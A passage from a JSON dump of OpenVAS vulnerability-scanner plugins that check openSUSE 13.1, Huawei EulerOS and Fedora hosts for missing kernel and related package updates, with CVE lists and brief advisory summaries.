rpm:\"vhba-kmp-desktop-debuginfo~20130607_k3.11.10_25~2.17.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-xen\", rpm:\"vhba-kmp-xen~20130607_k3.11.10_25~2.17.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-xen-debuginfo\", rpm:\"vhba-kmp-xen-debuginfo~20130607_k3.11.10_25~2.17.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox\", rpm:\"virtualbox~4.2.18~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-debuginfo\", 
rpm:\"virtualbox-debuginfo~4.2.18~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-debugsource\", rpm:\"virtualbox-debugsource~4.2.18~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-devel\", rpm:\"virtualbox-devel~4.2.18~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-default\", rpm:\"virtualbox-guest-kmp-default~4.2.18_k3.11.10_25~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-default-debuginfo\", rpm:\"virtualbox-guest-kmp-default-debuginfo~4.2.18_k3.11.10_25~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-desktop\", rpm:\"virtualbox-guest-kmp-desktop~4.2.18_k3.11.10_25~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-desktop-debuginfo\", rpm:\"virtualbox-guest-kmp-desktop-debuginfo~4.2.18_k3.11.10_25~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-tools\", rpm:\"virtualbox-guest-tools~4.2.18~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-tools-debuginfo\", rpm:\"virtualbox-guest-tools-debuginfo~4.2.18~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-x11\", rpm:\"virtualbox-guest-x11~4.2.18~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-x11-debuginfo\", rpm:\"virtualbox-guest-x11-debuginfo~4.2.18~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-default\", rpm:\"virtualbox-host-kmp-default~4.2.18_k3.11.10_25~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n 
if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-default-debuginfo\", rpm:\"virtualbox-host-kmp-default-debuginfo~4.2.18_k3.11.10_25~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-desktop\", rpm:\"virtualbox-host-kmp-desktop~4.2.18_k3.11.10_25~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-desktop-debuginfo\", rpm:\"virtualbox-host-kmp-desktop-debuginfo~4.2.18_k3.11.10_25~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-qt\", rpm:\"virtualbox-qt~4.2.18~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-qt-debuginfo\", rpm:\"virtualbox-qt-debuginfo~4.2.18~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-websrv\", rpm:\"virtualbox-websrv~4.2.18~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-websrv-debuginfo\", rpm:\"virtualbox-websrv-debuginfo~4.2.18~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-debugsource\", rpm:\"xen-debugsource~4.3.2_02~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-devel\", rpm:\"xen-devel~4.3.2_02~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-default\", rpm:\"xen-kmp-default~4.3.2_02_k3.11.10_25~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-default-debuginfo\", rpm:\"xen-kmp-default-debuginfo~4.3.2_02_k3.11.10_25~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-desktop\", rpm:\"xen-kmp-desktop~4.3.2_02_k3.11.10_25~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-desktop-debuginfo\", 
rpm:\"xen-kmp-desktop-debuginfo~4.3.2_02_k3.11.10_25~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs\", rpm:\"xen-libs~4.3.2_02~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs-debuginfo\", rpm:\"xen-libs-debuginfo~4.3.2_02~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-domU\", rpm:\"xen-tools-domU~4.3.2_02~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-domU-debuginfo\", rpm:\"xen-tools-domU-debuginfo~4.3.2_02~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons\", rpm:\"xtables-addons~2.3~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-debuginfo\", rpm:\"xtables-addons-debuginfo~2.3~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-debugsource\", rpm:\"xtables-addons-debugsource~2.3~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-default\", rpm:\"xtables-addons-kmp-default~2.3_k3.11.10_25~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-default-debuginfo\", rpm:\"xtables-addons-kmp-default-debuginfo~2.3_k3.11.10_25~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-desktop\", rpm:\"xtables-addons-kmp-desktop~2.3_k3.11.10_25~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-desktop-debuginfo\", rpm:\"xtables-addons-kmp-desktop-debuginfo~2.3_k3.11.10_25~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-xen\", rpm:\"xtables-addons-kmp-xen~2.3_k3.11.10_25~2.16.1\", 
rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-xen-debuginfo\", rpm:\"xtables-addons-kmp-xen-debuginfo~2.3_k3.11.10_25~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs\", rpm:\"kernel-docs~3.11.10~25.2\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source-vanilla\", rpm:\"kernel-source-vanilla~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.3.2_02~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-doc-html\", rpm:\"xen-doc-html~4.3.2_02~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs-32bit\", rpm:\"xen-libs-32bit~4.3.2_02~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-libs-debuginfo-32bit\", rpm:\"xen-libs-debuginfo-32bit~4.3.2_02~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools\", rpm:\"xen-tools~4.3.2_02~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-tools-debuginfo\", rpm:\"xen-tools-debuginfo~4.3.2_02~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-xend-tools\", rpm:\"xen-xend-tools~4.3.2_02~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-xend-tools-debuginfo\", rpm:\"xen-xend-tools-debuginfo~4.3.2_02~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae\", 
rpm:\"kernel-pae~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-base-debuginfo\", rpm:\"kernel-pae-base-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-debuginfo\", rpm:\"kernel-pae-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-debugsource\", rpm:\"kernel-pae-debugsource~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-devel\", rpm:\"kernel-pae-devel~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-devel-debuginfo\", rpm:\"kernel-pae-devel-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-pae\", rpm:\"cloop-kmp-pae~2.639_k3.11.10_25~11.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-pae-debuginfo\", rpm:\"cloop-kmp-pae-debuginfo~2.639_k3.11.10_25~11.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-pae\", rpm:\"crash-kmp-pae~7.0.2_k3.11.10_25~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-pae-debuginfo\", rpm:\"crash-kmp-pae-debuginfo~7.0.2_k3.11.10_25~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-pae\", rpm:\"hdjmod-kmp-pae~1.28_k3.11.10_25~16.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-pae-debuginfo\", rpm:\"hdjmod-kmp-pae-debuginfo~1.28_k3.11.10_25~16.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"ipset-kmp-pae\", rpm:\"ipset-kmp-pae~6.21.1_k3.11.10_25~2.20.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-pae-debuginfo\", rpm:\"ipset-kmp-pae-debuginfo~6.21.1_k3.11.10_25~2.20.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kmp-pae\", rpm:\"iscsitarget-kmp-pae~1.4.20.3_k3.11.10_25~13.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kmp-pae-debuginfo\", rpm:\"iscsitarget-kmp-pae-debuginfo~1.4.20.3_k3.11.10_25~13.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ndiswrapper-kmp-pae\", rpm:\"ndiswrapper-kmp-pae~1.58_k3.11.10_25~16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ndiswrapper-kmp-pae-debuginfo\", rpm:\"ndiswrapper-kmp-pae-debuginfo~1.58_k3.11.10_25~16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-pae\", rpm:\"pcfclock-kmp-pae~0.44_k3.11.10_25~258.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-pae-debuginfo\", rpm:\"pcfclock-kmp-pae-debuginfo~0.44_k3.11.10_25~258.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-pae\", rpm:\"vhba-kmp-pae~20130607_k3.11.10_25~2.17.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-pae-debuginfo\", rpm:\"vhba-kmp-pae-debuginfo~20130607_k3.11.10_25~2.17.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-pae\", rpm:\"virtualbox-guest-kmp-pae~4.2.18_k3.11.10_25~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-guest-kmp-pae-debuginfo\", rpm:\"virtualbox-guest-kmp-pae-debuginfo~4.2.18_k3.11.10_25~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n 
}\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-pae\", rpm:\"virtualbox-host-kmp-pae~4.2.18_k3.11.10_25~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-host-kmp-pae-debuginfo\", rpm:\"virtualbox-host-kmp-pae-debuginfo~4.2.18_k3.11.10_25~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-pae\", rpm:\"xen-kmp-pae~4.3.2_02_k3.11.10_25~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-pae-debuginfo\", rpm:\"xen-kmp-pae-debuginfo~4.3.2_02_k3.11.10_25~30.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-pae\", rpm:\"xtables-addons-kmp-pae~2.3_k3.11.10_25~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xtables-addons-kmp-pae-debuginfo\", rpm:\"xtables-addons-kmp-pae-debuginfo~2.3_k3.11.10_25~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-04-07T16:53:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2384", "CVE-2017-5753", "CVE-2015-3332", "CVE-2017-18595", "CVE-2019-0136", "CVE-2019-17666", "CVE-2016-3689", "CVE-2016-3139", "CVE-2015-9289", "CVE-2017-18551", "CVE-2016-2186", "CVE-2016-2187", "CVE-2014-5206", "CVE-2016-4569", "CVE-2016-7425", "CVE-2017-1000379", "CVE-2016-2184", "CVE-2017-1000253", "CVE-2019-17075", "CVE-2015-1350", "CVE-2014-4608", "CVE-2016-6197", "CVE-2018-14617", "CVE-2016-3138", "CVE-2016-3140", "CVE-2017-18509", "CVE-2016-4578", "CVE-2014-5207", "CVE-2015-8816", "CVE-2016-2185", "CVE-2016-6130", "CVE-2015-8844", "CVE-2015-8845", "CVE-2017-13168", "CVE-2019-17133"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": 
"2020-04-03T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220192599", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220192599", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-2599)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.2599\");\n script_version(\"2020-04-03T10:35:51+0000\");\n script_cve_id(\"CVE-2014-4608\", \"CVE-2014-5206\", \"CVE-2014-5207\", \"CVE-2015-1350\", \"CVE-2015-3332\", \"CVE-2015-8816\", \"CVE-2015-8844\", \"CVE-2015-8845\", \"CVE-2015-9289\", \"CVE-2016-2184\", \"CVE-2016-2185\", \"CVE-2016-2186\", \"CVE-2016-2187\", \"CVE-2016-2384\", \"CVE-2016-3138\", \"CVE-2016-3139\", \"CVE-2016-3140\", \"CVE-2016-3689\", \"CVE-2016-4569\", \"CVE-2016-4578\", \"CVE-2016-6130\", \"CVE-2016-6197\", \"CVE-2016-7425\", \"CVE-2017-1000253\", \"CVE-2017-1000379\", \"CVE-2017-13168\", \"CVE-2017-18509\", \"CVE-2017-18551\", \"CVE-2017-18595\", \"CVE-2017-5753\", \"CVE-2018-14617\", \"CVE-2019-0136\", \"CVE-2019-17075\", 
\"CVE-2019-17133\", \"CVE-2019-17666\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-03 10:35:51 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 13:08:20 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-2599)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP3\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-2599\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2599\");\n script_xref(name:\"URL\", value:\"https://git.kernel.org/linus/a87938b2e246b81b4fb713edb371a9fa3c5c3c86\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-2599 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"** DISPUTED ** Multiple integer overflows in the lzo1x_decompress_safe function in lib/lzo/lzo1x_decompress_safe.c in the LZO decompressor in the Linux kernel before 3.15.2 allow context-dependent attackers to cause a denial of service (memory corruption) via a crafted Literal Run. 
NOTE: the author of the LZO algorithms says 'the Linux kernel is *not* affected, media hype.'(CVE-2014-4608)\n\nA certain backport in the TCP Fast Open implementation for the Linux kernel before 3.18 does not properly maintain a count value, which allows local users to cause a denial of service (system crash) via the Fast Open feature, as demonstrated by visiting the chrome://flags/#enable-tcp-fast-open URL when using certain 3.10.x through 3.16.x kernel builds, including longterm-maintenance releases and ckt (aka Canonical Kernel Team) builds.(CVE-2015-3332)\n\nAn elevation of privilege vulnerability in the kernel scsi driver. Product: Android. Versions: Android kernel. Android ID A-65023233.(CVE-2017-13168)\n\nAn issue was discovered in drivers/i2c/i2c-core-smbus.c in the Linux kernel before 4.14.15. There is an out of bounds write in the function i2c_smbus_xfer_emulated.(CVE-2017-18551)\n\nAn issue was discovered in net/ipv6/ip6mr.c in the Linux kernel before 4.11. By setting a specific socket option, an attacker can control a pointer in kernel land and cause an inet_csk_listen_stop general protection fault, or potentially execute arbitrary code under certain circumstances. The issue can be triggered as root (e.g., inside a default LXC container or with the CAP_NET_ADMIN capability) or after namespace unsharing. This occurs because sk_type and protocol are not checked in the appropriate part of the ip6_mroute_* functions. NOTE: this affects Linux distributions that use 4.9.x longterm kernels before 4.9.187.(CVE-2017-18509)\n\nAn issue was discovered in the Linux kernel before 4.14.11. A double free may be caused by the function allocate_trace_buffer in the file kernel/trace/trace.c.(CVE-2017-18595)\n\nAn issue was discovered in the Linux kernel through 4.17.10. 
There is a NULL pointer dereference and panic in hfsplus_lookup() in fs/hfsplus/dir.c when opening a file (that is purportedly a hard link) in an hfs+ filesystem that has malformed catalog data, and is mounted read-only without a metadata directory.(CVE-2018-14617)\n\nAn issue was discovered in write_tpt_entry in drivers/infiniband/hw/cxgb4/mem.c in the Linux kernel through 5.3.2. The cxgb4 driver is directly calling dma_map_single (a DMA function) from a stack variable. This could allow an attacker to trigger a Denial of Service, exploitable if this driver is used on ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS V2.0SP3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~514.44.5.10.h234\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~514.44.5.10.h234\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~514.44.5.10.h234\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~514.44.5.10.h234\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~514.44.5.10.h234\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", 
rpm:\"kernel-tools~3.10.0~514.44.5.10.h234\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~514.44.5.10.h234\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~514.44.5.10.h234\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~514.44.5.10.h234\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3122", "CVE-2014-5077", "CVE-2014-3940", "CVE-2014-0155", "CVE-2014-0131", "CVE-2014-0100", "CVE-2014-1737", "CVE-2014-4699", "CVE-2014-1874", "CVE-2014-4508", "CVE-2014-1738", "CVE-2014-2568", "CVE-2014-4943", "CVE-2014-0206", "CVE-2014-3145", "CVE-2014-4171", "CVE-2014-1446", "CVE-2014-5206", "CVE-2014-4014", "CVE-2013-6368", "CVE-2014-3917", "CVE-2014-0196", "CVE-2014-2851", "CVE-2014-3534", "CVE-2014-2309", "CVE-2014-2678", "CVE-2014-2039", "CVE-2014-5045", "CVE-2014-4715", "CVE-2013-4579", "CVE-2014-3144", "CVE-2014-0102", "CVE-2014-3153", "CVE-2014-2580", "CVE-2013-6367", "CVE-2014-0049", "CVE-2014-0181", "CVE-2013-6376", "CVE-2014-0055", "CVE-2014-5207", "CVE-2014-1438", "CVE-2014-0077", "CVE-2013-4587", "CVE-2014-2523", "CVE-2014-0101", "CVE-2014-0069"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-08-17T00:00:00", "id": "OPENVAS:1361412562310868101", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868101", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2014-9466", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2014-9466\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868101\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-08-17 05:07:47 +0200 (Sun, 17 Aug 2014)\");\n script_cve_id(\"CVE-2014-5206\", \"CVE-2014-5207\", \"CVE-2014-5077\", \"CVE-2014-4171\",\n \"CVE-2014-5045\", \"CVE-2014-3534\", \"CVE-2014-4943\", \"CVE-2014-4715\",\n 